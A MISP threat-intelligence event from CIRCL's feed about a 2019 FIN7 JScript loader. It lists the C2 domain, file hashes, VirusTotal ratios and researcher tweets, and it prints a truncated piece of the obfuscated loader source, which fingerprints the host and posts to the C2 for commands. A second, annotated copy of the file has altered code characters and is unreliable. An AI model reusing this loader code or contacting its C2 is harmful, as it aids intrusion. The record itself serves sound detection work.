misp-circl-feed/feeds/circl/misp/5cda6599-990c-4803-8c89-45e4950d210f.json

{
  "Event": {
    "analysis": "0",
    "date": "2019-05-13",
    "extends_uuid": "",
    "info": "OSINT - [Emering] FIN7 JScript Loader Malware",
    "publish_timestamp": "1563528143",
    "published": true,
    "threat_level_id": "3",
    "timestamp": "1563528133",
    "uuid": "5cda6599-990c-4803-8c89-45e4950d210f",
    "Orgc": {
      "name": "CIRCL",
      "uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
    },
    "Tag": [
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-enterprise-attack-intrusion-set=\"FIN7\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-enterprise-attack-intrusion-set=\"FIN7 - G0046\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-intrusion-set=\"FIN7\"",
        "relationship_type": ""
      },
      {
        "colour": "#0088cc",
        "local": false,
        "name": "misp-galaxy:mitre-intrusion-set=\"FIN7 - G0046\"",
        "relationship_type": ""
      },
      {
        "colour": "#12e400",
        "local": false,
        "name": "misp-galaxy:threat-actor=\"Anunak\"",
        "relationship_type": ""
      },
      {
        "colour": "#3a7300",
        "local": false,
        "name": "circl:incident-classification=\"malware\"",
        "relationship_type": ""
      },
      {
        "colour": "#002642",
        "local": false,
        "name": "osint:source-type=\"microblog-post\"",
        "relationship_type": ""
      },
      {
        "colour": "#ffffff",
        "local": false,
        "name": "tlp:white",
        "relationship_type": ""
      }
    ],
    "Attribute": [
      {
        "category": "Network activity",
        "comment": "C2",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1557819376",
        "to_ids": true,
        "type": "domain",
        "uuid": "5cda6ff0-4758-4fe6-a14d-4f4f950d210f",
        "value": "msdn-update.com"
      },
      {
        "category": "Other",
        "comment": "2019-05-13-FIN7-JS-loader.vk.js",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1557820480",
        "to_ids": false,
        "type": "other",
        "uuid": "5cda7440-6ef4-459c-b3d1-b951950d210f",
        "value": "// Bank Statement James Fifeman.xls\r\n// C2: hxxps://msdn-update[.]com/\r\n// SHA-256: 1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1\r\n\r\nfunction anonymous() {\r\n    var zbegbiwhuhro = \"&id=\";\r\n    var ihebgysipc = \"fetch\";\r\n    var yfusrihyny = \"\";\r\n    var tindajrurke = \"get_image\";\r\n    var ytysqyprozlibx = \"string\";\r\n    var otocywviso = \"no\";\r\n    var otbybimollu = \"Unknown\";\r\n    var evaritpequx = \"Scripting.FileSystemObject\";\r\n    var yqpawymfikorh = \"_\";\r\n    var koficijojhi = \"/\";\r\n    var inoxhegzajw = \"action=get_command\";\r\n    var ihunuxfip = \"request\";\r\n    var edomsecejso = \"z\";\r\n    var lwilpotasvo = \"create_logo\";\r\n    var vimkiwono = \"string\";\r\n    var pidwagunit = \"%APPDATA%\";\r\n    var gqyxqohoftupi = \"winmgmts:root/CIMV2\";\r\n    var erzirolonje = \"create_image\";\r\n    var esajigfown = \"decrypt\";\r\n    var ewypetevhu = \"?request=page\";\r\n    var bgixmabefzaqnu = \"show_ico\";\r\n    var huzzakrowopvu = \"\";\r\n    var zexygrogy = \"\";\r\n    var iwpodhexzubc = \"images\";\r\n    var bbymyruztovpi = \"WScript.Shell\";\r\n    var xaprislyhbulf = \"show_jpg\";\r\n    var inbypzethezag = \"&\";\r\n    var ucmomadgib = \"request\";\r\n    var vjiwumhojarse = \"group=zsoc._1305&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=\";\r\n    var cedlihrijalti = \"?request=content&id=\";\r\n    var kyppaltuwti = \"image\";\r\n    var ejogamygpu = \"MSXML2.ServerXMLHTTP\";\r\n    var cylofalpitx = \"content\";\r\n    var fifuwacdez = \"encrypt\";\r\n    var atkudecaxme = \"decrypt\";\r\n    var obawufdoxsa = \"\";\r\n    var bhomnismictu = \"encrypt\";\r\n    var ocsekeltan = \"show_png\";\r\n    var vivijsozvali = \"User-Agent\";\r\n    var yracypcamos = \"no\";\r\n    var kexerobi = \"cdn\";\r\n    var inamvagtixjyxj = \"POST\";\r\n    var usubhejreva = \"_\";\r\n    var jaxylibpafl = \"\";\r\n    var hbanamyklujt = \"\";\r\n    var bvaxoqwetmodg = \"agyjabam=\";\r\n    var ditevnaqa = \"https://msdn-update.com/\";\r\n    var wegmexxabha = \"POST\";\r\n    var dnanehmufride = \"encrypt\";\r\n    var fypalygos = \"application/x-www-form-urlencoded\";\r\n    var urmuqizemz = \"Content-Type\";\r\n\r\n    function id() {\r\n        var lrequest = wmi.ExecQuery(\"select * from Win32_NetworkAdapterConfiguration where ipenabled = true\");\r\n        var lItems = new Enumerator(lrequest);\r\n        for (; !lItems.atEnd(); lItems.moveNext()) {\r\n            var mac = lItems.item().macaddress;\r\n            var dns_hostname = lItems.item().DNSHostName;\r\n            if (typeof mac === vimkiwono && mac.length > 1) {\r\n                if (typeof dns_hostname !== vimkiwono && dns_hostname.length < 1) {\r\n                    dns_hostname = otbybimollu;\r\n                } else {\r\n                    for (var i = 0; i < dns_hostname.length; i++) {\r\n                        if (dns_hostname.charAt(i) > edomsecejso) {\r\n                            dns_hostname = dns_hostname.substr(0, i) + yqpawymfikorh + dns_hostname.substr(i + 1);\r\n                        }\r\n                    }\r\n                }\r\n                return mac + yqpawymfikorh + dns_hostname;\r\n            }\r\n        }\r\n    }\r\n\r\n    function crypt_controller(type, request) {\r\n        var encryption_key = obawufdoxsa;\r\n        if (type === esajigfown) {\r\n            request = unescape(request);\r\n            var request_split = request.split(\")*(\");\r\n            request = request_split[0];\r\n            encryption_key = request_split[1].split(obawufdoxsa);\r\n        } else {\r\n            encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(obawufdoxsa);\r\n            request = unescape(encodeURIComponent(request));\r\n        }\r\n        var output = new Array(request.length);\r\n        for (var i = 0; i < request.length; i++) {\r\n            var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);\r\n            output[i] = String.fromCharCod
      },
      {
        "category": "Network activity",
        "comment": "C2",
        "deleted": false,
        "disable_correlation": false,
        "timestamp": "1557823797",
        "to_ids": true,
        "type": "url",
        "uuid": "5cda8135-1174-4cd2-ae6b-456d950d210f",
        "value": "https://msdn-update.com/"
      }
    ],
    "Object": [
      {
        "comment": "",
        "deleted": false,
        "description": "Microblog post like a Twitter tweet or a post on a Facebook wall.",
        "meta-category": "misc",
        "name": "microblog",
        "template_uuid": "8ec8c911-ddbe-4f5b-895b-fbff70c42a60",
        "template_version": "5",
        "timestamp": "1557817476",
        "uuid": "5cda6884-2c74-4a8c-886d-47e3950d210f",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "post",
            "timestamp": "1557817476",
            "to_ids": false,
            "type": "text",
            "uuid": "5cda6884-fafc-4ff5-86eb-46cc950d210f",
            "value": "2019-05-13: [Emering] #FIN7 JScript Loader #Malware\r\n\u00f0\u0178\u0090\u00b2\r\n\r\nsource: 'Bank Statement James Fifeman.xls'\r\ngroup: 'zsoc._1305' [May 13]\r\n\u00f0\u0178\u203a\u2018\r\nc2: 'msdn-update[.]com'\r\n\u00f0\u0178\u201d\u00a6\r\nMove away from '-cdn' domains \r\n\u00f0\u0178\u00a4\u201d\r\n\r\nh/t @malz_intel\r\n\r\n\u00f0\u0178\u203a\u00a1\u00ef\u00b8\u008f\r\nPushed to their extracted JS loader GitHub -> \r\n(link: https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-05-13-FIN7-JS-loader.vk.js) github.com/k-vitali/Malwa\u00e2\u20ac\u00a6"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "type",
            "timestamp": "1557817476",
            "to_ids": false,
            "type": "text",
            "uuid": "5cda6884-df40-4d23-bd55-4264950d210f",
            "value": "Twitter"
          },
          {
            "category": "Network activity",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "url",
            "timestamp": "1557817476",
            "to_ids": true,
            "type": "url",
            "uuid": "5cda6884-8acc-4b2f-8684-49c8950d210f",
            "value": "https://twitter.com/VK_Intel/status/1128079463785349121"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "username-quoted",
            "timestamp": "1557817476",
            "to_ids": false,
            "type": "text",
            "uuid": "5cda6884-c40c-4d40-b736-4967950d210f",
            "value": "@malz_intel"
          },
          {
            "category": "Network activity",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "link",
            "timestamp": "1557817476",
            "to_ids": true,
            "type": "url",
            "uuid": "5cda6884-cefc-440d-97f9-4714950d210f",
            "value": "https://t.co/BaCFsrePJR?amp=1"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "link",
            "timestamp": "1557817476",
            "to_ids": true,
            "type": "url",
            "uuid": "5cda6884-4d8c-4584-85d0-4a50950d210f",
            "value": "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-05-13-FIN7-JS-loader.vk.js"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "creation-date",
            "timestamp": "1557817477",
            "to_ids": false,
            "type": "datetime",
            "uuid": "5cda6885-34b0-4285-be67-4cb6950d210f",
            "value": "2019-05-14T01:27:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "username",
            "timestamp": "1557817477",
            "to_ids": false,
            "type": "text",
            "uuid": "5cda6885-5680-4687-a649-4a84950d210f",
            "value": "VK_Intel"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "17",
        "timestamp": "1557819654",
        "uuid": "5cda6f37-4d7c-4ad4-9000-6ec3950d210f",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "filename",
            "timestamp": "1557819654",
            "to_ids": true,
            "type": "filename",
            "uuid": "5cda6f37-eb5c-4ade-b804-6ec3950d210f",
            "value": "Bank Statement James Fifeman.xls"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "state",
            "timestamp": "1557819654",
            "to_ids": false,
            "type": "text",
            "uuid": "5cda6f37-4910-45f7-ae79-6ec3950d210f",
            "value": "Malicious"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1557819654",
            "to_ids": true,
            "type": "sha256",
            "uuid": "5cda7106-f620-4d93-ae5a-90d9950d210f",
            "value": "1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "15",
        "timestamp": "1563528120",
        "uuid": "8d2ae1f9-3b21-43e4-aceb-121f903988bc",
        "ObjectReference": [
          {
            "comment": "",
            "object_uuid": "8d2ae1f9-3b21-43e4-aceb-121f903988bc",
            "referenced_uuid": "72369506-7485-494e-b492-2a31c412cf70",
            "relationship_type": "analysed-with",
            "timestamp": "1557822889",
            "uuid": "5cda7da9-0520-426f-bf88-4067950d210f"
          },
          {
            "comment": "",
            "object_uuid": "8d2ae1f9-3b21-43e4-aceb-121f903988bc",
            "referenced_uuid": "7fc62f80-7bf1-48af-96f6-2c3c99a4536c",
            "relationship_type": "analysed-with",
            "timestamp": "1563528121",
            "uuid": "5d318bb9-ae80-4282-9aa5-4acf02de0b81"
          }
        ],
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "md5",
            "timestamp": "1557819654",
            "to_ids": true,
            "type": "md5",
            "uuid": "babbec72-3926-4d8d-8931-a9e3f9965c71",
            "value": "b136fed01acf1b7e7e43dfa2db292623"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha1",
            "timestamp": "1557819654",
            "to_ids": true,
            "type": "sha1",
            "uuid": "be4cdb98-9ba6-4943-9845-08f7b1ef677a",
            "value": "d8206bc4bc2efc4062b0f173e8841508c95ed0e4"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1557819654",
            "to_ids": true,
            "type": "sha256",
            "uuid": "01abe297-6d6a-442f-9a70-b484f8861e53",
            "value": "1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "VirusTotal report",
        "meta-category": "misc",
        "name": "virustotal-report",
        "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
        "template_version": "2",
        "timestamp": "1557822889",
        "uuid": "72369506-7485-494e-b492-2a31c412cf70",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "last-submission",
            "timestamp": "1557819654",
            "to_ids": false,
            "type": "datetime",
            "uuid": "4ff03189-7f70-4120-9dbf-48339e5c57d0",
            "value": "2019-05-14T04:00:38"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "permalink",
            "timestamp": "1557819654",
            "to_ids": false,
            "type": "link",
            "uuid": "521c12c0-2269-4961-8bad-1482e01ee72b",
            "value": "https://www.virustotal.com/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/analysis/1557806438/"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "detection-ratio",
            "timestamp": "1557819654",
            "to_ids": false,
            "type": "text",
            "uuid": "c267d1a4-d836-4758-91e2-877f5854faf6",
            "value": "11/60"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Microblog post like a Twitter tweet or a post on a Facebook wall.",
        "meta-category": "misc",
        "name": "microblog",
        "template_uuid": "8ec8c911-ddbe-4f5b-895b-fbff70c42a60",
        "template_version": "5",
        "timestamp": "1557835644",
        "uuid": "5cdaaf7c-422c-4524-856c-464b950d210f",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "post",
            "timestamp": "1557835645",
            "to_ids": false,
            "type": "text",
            "uuid": "5cdaaf7d-cca4-49d5-bf6c-4e64950d210f",
            "value": "@VK_Intel\r\n Moar #FIN7 (link: https://www.virustotal.com/#/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/detection) virustotal.com/#/file/1fe27e0\u00e2\u20ac\u00a6\r\nCscript renamed to mswmex57.exe and run from Contacts directory. JavaScript from UserForm1 placed in querlog.txt just like old times. New C2 though: hxxps://msdn-update[.]com/"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "type",
            "timestamp": "1557835645",
            "to_ids": false,
            "type": "text",
            "uuid": "5cdaaf7d-89bc-4f82-9c5f-4295950d210f",
            "value": "Twitter"
          },
          {
            "category": "Network activity",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "url",
            "timestamp": "1557835645",
            "to_ids": true,
            "type": "url",
            "uuid": "5cdaaf7d-5bc8-4555-bfdf-4dc4950d210f",
            "value": "https://twitter.com/malz_intel/status/1128058016471719936"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "username-quoted",
            "timestamp": "1557835645",
            "to_ids": false,
            "type": "text",
            "uuid": "5cdaaf7d-d750-4d9d-a9a6-4b4b950d210f",
            "value": "@VK_Intel"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "creation-date",
            "timestamp": "1557835645",
            "to_ids": false,
            "type": "datetime",
            "uuid": "5cdaaf7d-9734-4341-ae0f-4d72950d210f",
            "value": "2019-05-14T00:02:00"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "username",
            "timestamp": "1557835645",
            "to_ids": false,
            "type": "text",
            "uuid": "5cdaaf7d-bb48-4f3f-80bb-48a2950d210f",
            "value": "malz_intel"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "VirusTotal report",
        "meta-category": "misc",
        "name": "virustotal-report",
        "template_uuid": "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4",
        "template_version": "2",
        "timestamp": "1563528121",
        "uuid": "7fc62f80-7bf1-48af-96f6-2c3c99a4536c",
        "Attribute": [
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "last-submission",
            "timestamp": "1557819654",
            "to_ids": false,
            "type": "datetime",
            "uuid": "c1bf4318-12d5-451a-a094-3ecf4f476b2a",
            "value": "2019-06-12T04:39:43"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "permalink",
            "timestamp": "1557819654",
            "to_ids": false,
            "type": "link",
            "uuid": "4b41b608-5721-4f9a-8950-7775eefaebce",
            "value": "https://www.virustotal.com/file/1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1/analysis/1560314383/"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "detection-ratio",
            "timestamp": "1557819654",
            "to_ids": false,
            "type": "text",
            "uuid": "de92bfbb-35cc-4731-8327-4be37aa1cbee",
            "value": "30/59"
          }
        ]
      }
    ]
  }
}
chg: [feed] added 2023-04-21 13:25:09 +00:00			`{`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"Event": {`
			`"analysis": "0",`
			`"date": "2019-05-13",`
			`"extends_uuid": "",`
			`"info": "OSINT - [Emering] FIN7 JScript Loader Malware",`
			`"publish_timestamp": "1563528143",`
			`"published": true,`
			`"threat_level_id": "3",`
			`"timestamp": "1563528133",`
			`"uuid": "5cda6599-990c-4803-8c89-45e4950d210f",`
			`"Orgc": {`
			`"name": "CIRCL",`
			`"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"`
			`},`
			`"Tag": [`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-enterprise-attack-intrusion-set=\"FIN7\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-enterprise-attack-intrusion-set=\"FIN7 - G0046\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-intrusion-set=\"FIN7\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#0088cc",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:mitre-intrusion-set=\"FIN7 - G0046\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#12e400",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "misp-galaxy:threat-actor=\"Anunak\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#3a7300",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "circl:incident-classification=\"malware\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#002642",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "osint:source-type=\"microblog-post\"",`
			`"relationship_type": ""`
			`},`
			`{`
			`"colour": "#ffffff",`
chg: [feed] updated 2024-04-05 12:15:17 +00:00			`"local": false,`
chg: [gen] updated 2023-12-14 14:30:15 +00:00			`"name": "tlp:white",`
			`"relationship_type": ""`
			`}`
			`],`
			`"Attribute": [`
			`{`
			`"category": "Network activity",`
			`"comment": "C2",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"timestamp": "1557819376",`
			`"to_ids": true,`
			`"type": "domain",`
			`"uuid": "5cda6ff0-4758-4fe6-a14d-4f4f950d210f",`
			`"value": "msdn-update.com"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "2019-05-13-FIN7-JS-loader.vk.js",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"timestamp": "1557820480",`
			`"to_ids": false,`
			`"type": "other",`
			`"uuid": "5cda7440-6ef4-459c-b3d1-b951950d210f",`
			"value": "// Bank Statement James Fifeman.xls\r\n// C2: hxxps://msdn-update[.]com/\r\n// SHA-256: 1fe27e0a84a5bd2e433360fd2da5b1cad8d142ca2acbf3e256f0c99d99cb57f1\r\n\r\nfunction anonymous() {\r\n var zbegbiwhuhro = \"&id=\";\r\n var ihebgysipc = \"fetch\";\r\n var yfusrihyny = \"\";\r\n var tindajrurke = \"get_image\";\r\n var ytysqyprozlibx = \"string\";\r\n var otocywviso = \"no\";\r\n var otbybimollu = \"Unknown\";\r\n var evaritpequx = \"Scripting.FileSystemObject\";\r\n var yqpawymfikorh = \"_\";\r\n var koficijojhi = \"/\";\r\n var inoxhegzajw = \"action=get_command\";\r\n var ihunuxfip = \"request\";\r\n var edomsecejso = \"z\";\r\n var lwilpotasvo = \"create_logo\";\r\n var vimkiwono = \"string\";\r\n var pidwagunit = \"%APPDATA%\";\r\n var gqyxqohoftupi = \"winmgmts:root/CIMV2\";\r\n var erzirolonje = \"create_image\";\r\n var esajigfown = \"decrypt\";\r\n var ewypetevhu = \"?request=page\";\r\n var bgixmabefzaqnu = \"show_ico\";\r\n var huzzakrowopvu = \"\";\r\n var zexygrogy = \"\";\r\n var iwpodhexzubc = \"images\";\r\n var bbymyruztovpi = \"WScript.Shell\";\r\n var xaprislyhbulf = \"show_jpg\";\r\n var inbypzethezag = \"&\";\r\n var ucmomadgib = \"request\";\r\n var vjiwumhojarse = \"group=zsoc._1305&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=\";\r\n var cedlihrijalti = \"?request=content&id=\";\r\n var kyppaltuwti = \"image\";\r\n var ejogamygpu = \"MSXML2.ServerXMLHTTP\";\r\n var cylofalpitx = \"content\";\r\n var fifuwacdez = \"encrypt\";\r\n var atkudecaxme = \"decrypt\";\r\n var obawufdoxsa = \"\";\r\n var bhomnismictu = \"encrypt\";\r\n var ocsekeltan = \"show_png\";\r\n var vivijsozvali = \"User-Agent\";\r\n var yracypcamos = \"no\";\r\n var kexerobi = \"cdn\";\r\n var inamvagtixjyxj = \"POST\";\r\n var usubhejreva = \"_\";\r\n var jaxylibpafl = \"\";\r\n var hbanamyklujt = \"\";\r\n var bvaxoqwetmodg = \"agyjabam=\";\r\n var ditevnaqa = \"https://msdn-update.com/\";\r\n var wegmexxabha = \"POST\";\r\n var dnanehmufride = \"encrypt\";\r\n var fypalygos = \"application/x-www-form-urlencoded\";\r\n var urmuqizemz = \"Content-Type\";\r\n\r\n function id() {\r\n var lrequest = wmi.ExecQuery(\"select * from Win32_NetworkAdapterConfiguration where ipenabled = true\");\r\n var lItems = new Enumerator(lrequest);\r\n for (; !lItems.atEnd(); lItems.moveNext()) {\r\n var mac = lItems.item().macaddress;\r\n var dns_hostname = lItems.item().DNSHostName;\r\n if (typeof mac === vimkiwono && mac.length > 1) {\r\n if (typeof dns_hostname !== vimkiwono && dns_hostname.length < 1) {\r\n dns_hostname = otbybimollu;\r\n } else {\r\n for (var i = 0; i < dns_hostname.length; i++) {\r\n if (dns_hostname.charAt(i) > edomsecejso) {\r\n dns_hostname = dns_hostname.substr(0, i) + yqpawymfikorh + dns_hostname.substr(i + 1);\r\n }\r\n }\r\n }\r\n return mac + yqpawymfikorh + dns_hostname;\r\n }\r\n }\r\n }\r\n\r\n function crypt_controller(type, request) {\r\n var encryption_key = obawufdoxsa;\r\n if (type === esajigfown) {\r\n request = unescape(request);\r\n var request_split = request.split(\")(\");\r\n request = request_split[0];\r\n encryption_key = request_split[1].split(obawufdoxsa);\r\n } else {\r\n encryption_key = (Math.floor(Math.random() 9000) + 1000).toString().split(obawufdoxsa);\r\n request = unescape(encodeURIComponent(request));\r\n }\r\n var output = new Array(request.length);\r\n for (var i = 0; i < request.length; i++) {\r\n var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);\r\n output[i] = String.fromCharCod
			`},`
			`{`
			`"category": "Network activity",`
			`"comment": "C2",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"timestamp": "1557823797",`
			`"to_ids": true,`
			`"type": "url",`
			`"uuid": "5cda8135-1174-4cd2-ae6b-456d950d210f",`
			`"value": "https://msdn-update.com/"`
			`}`
			`],`
			`"Object": [`
			`{`
			`"comment": "",`
			`"deleted": false,`
			`"description": "Microblog post like a Twitter tweet or a post on a Facebook wall.",`
			`"meta-category": "misc",`
			`"name": "microblog",`
			`"template_uuid": "8ec8c911-ddbe-4f5b-895b-fbff70c42a60",`
			`"template_version": "5",`
			`"timestamp": "1557817476",`
			`"uuid": "5cda6884-2c74-4a8c-886d-47e3950d210f",`
			`"Attribute": [`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "post",`
			`"timestamp": "1557817476",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cda6884-fafc-4ff5-86eb-46cc950d210f",`
			"value": "2019-05-13: [Emering] #FIN7 JScript Loader #Malware\r\n\u00f0\u0178\u0090\u00b2\r\n\r\nsource: 'Bank Statement James Fifeman.xls'\r\ngroup: 'zsoc._1305' [May 13]\r\n\u00f0\u0178\u203a\u2018\r\nc2: 'msdn-update[.]com'\r\n\u00f0\u0178\u201d\u00a6\r\nMove away from '-cdn' domains \r\n\u00f0\u0178\u00a4\u201d\r\n\r\nh/t @malz_intel\r\n\r\n\u00f0\u0178\u203a\u00a1\u00ef\u00b8\u008f\r\nPushed to their extracted JS loader GitHub -> \r\n(link: https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-05-13-FIN7-JS-loader.vk.js) github.com/k-vitali/Malwa\u00e2\u20ac\u00a6"
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": true,`
			`"object_relation": "type",`
			`"timestamp": "1557817476",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cda6884-df40-4d23-bd55-4264950d210f",`
			`"value": "Twitter"`
			`},`
			`{`
			`"category": "Network activity",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "url",`
			`"timestamp": "1557817476",`
			`"to_ids": true,`
			`"type": "url",`
			`"uuid": "5cda6884-8acc-4b2f-8684-49c8950d210f",`
			`"value": "https://twitter.com/VK_Intel/status/1128079463785349121"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "username-quoted",`
			`"timestamp": "1557817476",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cda6884-c40c-4d40-b736-4967950d210f",`
			`"value": "@malz_intel"`
			`},`
			`{`
			`"category": "Network activity",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "link",`
			`"timestamp": "1557817476",`
			`"to_ids": true,`
			`"type": "url",`
			`"uuid": "5cda6884-cefc-440d-97f9-4714950d210f",`
			`"value": "https://t.co/BaCFsrePJR?amp=1"`
			`},`
			`{`
			`"category": "Payload delivery",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "link",`
			`"timestamp": "1557817476",`
			`"to_ids": true,`
			`"type": "url",`
			`"uuid": "5cda6884-4d8c-4584-85d0-4a50950d210f",`
			`"value": "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-05-13-FIN7-JS-loader.vk.js"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "creation-date",`
			`"timestamp": "1557817477",`
			`"to_ids": false,`
			`"type": "datetime",`
			`"uuid": "5cda6885-34b0-4285-be67-4cb6950d210f",`
			`"value": "2019-05-14T01:27:00"`
			`},`
			`{`
			`"category": "Other",`
			`"comment": "",`
			`"deleted": false,`
			`"disable_correlation": false,`
			`"object_relation": "username",`
			`"timestamp": "1557817477",`
			`"to_ids": false,`
			`"type": "text",`
			`"uuid": "5cda6885-5680-4687-a649-4a84950d210f",`
			`"value": "VK_Intel"`
			`}`
			`]`
			`},`
			`{`
			`"comment": "",`
			`"deleted": false,`
			`"description": "File object describing a file with meta-information",`
			`"meta-category": "file",`
			`"name": "file",`
